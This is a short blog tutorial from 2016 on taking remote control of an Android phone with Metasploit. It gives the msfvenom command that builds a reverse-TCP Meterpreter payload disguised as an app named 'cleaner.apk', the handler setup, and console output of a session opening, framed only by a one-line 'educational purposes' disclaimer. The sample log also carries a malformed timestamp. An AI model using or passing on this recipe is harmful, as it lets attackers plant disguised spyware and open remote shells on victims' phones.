Ankit R Gadiya

How to hack an Android Device

A tutorial for hacking an android device using Metasploit Framework on Kali Linux.

May 24, 2016

This is a tutorial for hacking an android using Metasploit Framework.

Note: This tutorial is for educational purposes I’m not responsible for any misuse of it.

Requirements:


  • Kali Linux
  • Metasploit Framework installed.

Note: This can be done on other distros with Metasploit package but Kali Linux gives favourable environment with all packages pre-installed.

Steps:


  • Create an android apk file using msfvenom.
    $ msfvenom -p android/meterpreter/reverse_tcp LHOST="IP ADDR"
     LPORT=4444 R > cleaner.apk
    

    Note: Replace IP ADDR with your ip address.

  • Fire up msfconsole
    $ msfconsole
    
  • To listen to the payload, setup a handler.
    msf> use exploit/multi/handler
    msf exploit(handler)> set PAYLOAD android/meterpreter/reverse_tcp
    
  • Check its configurations.
    msf exploit(handler)> show options
    
  • Set the LHOST and LPORT you specified earlier using these commands.
    msf exploit(handler)> set LHOST "IP ADDR"
    msf exploit(handler)> set LPORT 4444
    
  • Start the exploit
    msf exploit(handler)> exploit
    

    You need to transfer the apk file we generated previously to the testing phone and install it. Once that app is opened in the phone meterpreter session will start.

    [*] Started reverse TCP handler on 192.168.0.100:4444
    [*] Starting the payload handler...
    [*] Sending stage (63194 bytes) to 192.168.0.106
    [*] Meterpreter session 1 opened (192.168.0.100:4444 ->
     192.168.0.106:35897) at 2016-055-24 _05:30
    meterpreter >
    
  • Done!

  • For options use this
    meterpreter > help